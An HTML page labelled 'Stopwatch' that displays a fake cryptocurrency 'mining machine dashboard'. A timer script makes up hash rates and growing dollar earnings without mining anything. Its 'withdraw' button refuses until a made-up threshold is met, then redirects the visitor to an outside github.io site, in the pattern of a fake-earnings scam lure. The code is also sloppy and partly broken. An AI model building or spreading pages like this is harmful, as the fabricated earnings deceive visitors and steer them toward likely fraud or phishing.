<!DOCTYPE html>
<html lang="en">
<head>
       <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Stopwatch</title>
    <style>
        *,
*:before,
*:after {
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}

body {
    background: auto;
    background-color: auto;
    color: auto;
}

.container {
    width: 40%;
    min-width: 90%;    
    position: relative;
    transform: translate(-50%, -50%);    
    margin-top: 50%;
    left: 50%;
    padding: 20px 10px;
    padding-bottom: 10px;
    border-radius: 10px;
    box-shadow: 0 0 20px rgba(0, 0, 0, 0.338);
}


.timer-display {
    position: relative;
    width: 92%;
    
    left: 4%;
    font-family: "Inter", sans-serif;
    font-size: 1em;
    font-weight: 500;
    padding: auto 10px auto 10px;
    display: flex;
    margin-top: 10px;
    margin-bottom: 10px;
    align-items: center;
    justify-content: space-around;
    border-radius: 5px;
    box-shadow: 0 0 20px rgba(65, 5, 145, 0.25);
}

.buttons {
    width: 100%;
    background-color: auto;
    margin-top: 50px auto 0 auto;
    display: flex;
    
}
.buttons button {
    width: 120px;
    height: 45px;
    background-color: #8c52ff;
    color: #fff;
    border: none;
    font-family: 'Poppins', sans-serif;
    font-size: 18px;
    border-radius: 5px;
    cursor: pointer;
    outline: none;
    margin: 10px;
}

.buttons button:hover {
    box-shadow: 0 0 20px rgba(0, 0, 0, 0.25);
}
.span {
    color: green;
}
    </style>
</head>
<body>
    <div class="container">
        <h5> &#128640 &#128640 mining machine dashboard
        <div class="timer-display">
           <div class="buttons">
            <button id="start-timer">start</button>
            200 H/s
        </div>
        </div>
        <div class="buttons"> 
            <button id="reset-timer" class="buttonn" onclick="cash()">withdraw</button>
        <span id="name-error"> lowest: 24$ highest: 200$</span>            
    </div>
    </h5>
    </div>
    <script>
        var nameError = document.getElementById('name-error');
 let [milliseconds, seconds, minutes, hours, dates] = [0, 0, 0, 0, 0];
let timeRef = document.querySelector(".timer-display");
let int = null;

document.getElementById("start-timer").addEventListener("click", () => {

    if(int !== null) {
        clearInterval(int);
    }
    int = setInterval(displayTimer, 10);
}); 

function displayTimer() {
    milliseconds += 10;
    if(milliseconds == 1000) {
        milliseconds = 0;
        seconds++;
        if(seconds == 60) {
            seconds = 0;
            minutes++;
            if(minutes == 36) {
                minutes = 0;
                hours++;
                if(hours == 20) {
                hours = 0;
                dates++;
                dates += 9;
                if(dates == 1) {
              nameError.innerHTML = 'withdow now &#9889';
                }
              }  
            }
        }
    }
    let d = dates < 10 ? "" + dates : dates;
    let h = hours < 10 ? "" + hours : hours;
    let m = minutes < 10 ? "" + minutes : minutes;
    let s = seconds < 10 ? "0" + seconds : seconds;
    let ms = 
        milliseconds < 10
        ? "00" + milliseconds
        : milliseconds < 100
        ? "0" + milliseconds
        : milliseconds;

    timeRef.innerHTML = `Basic speed: 1000 H/s ${s}${ms}
<br>&#9935 mined $${h}.${m}            <br><span class="span">total earnings: $${d}</span>`;
}
function cash(){
   if (!dates){
   event.preventDefault();
  nameError.innerHTML = '	&#x26A0 mined at least 24$';
        return false;
    }
    else if(dates){
    window.location.assign("https://opaying-online.github.io/two/");
        return true;
        }
}
    </script>
</body>
</html>
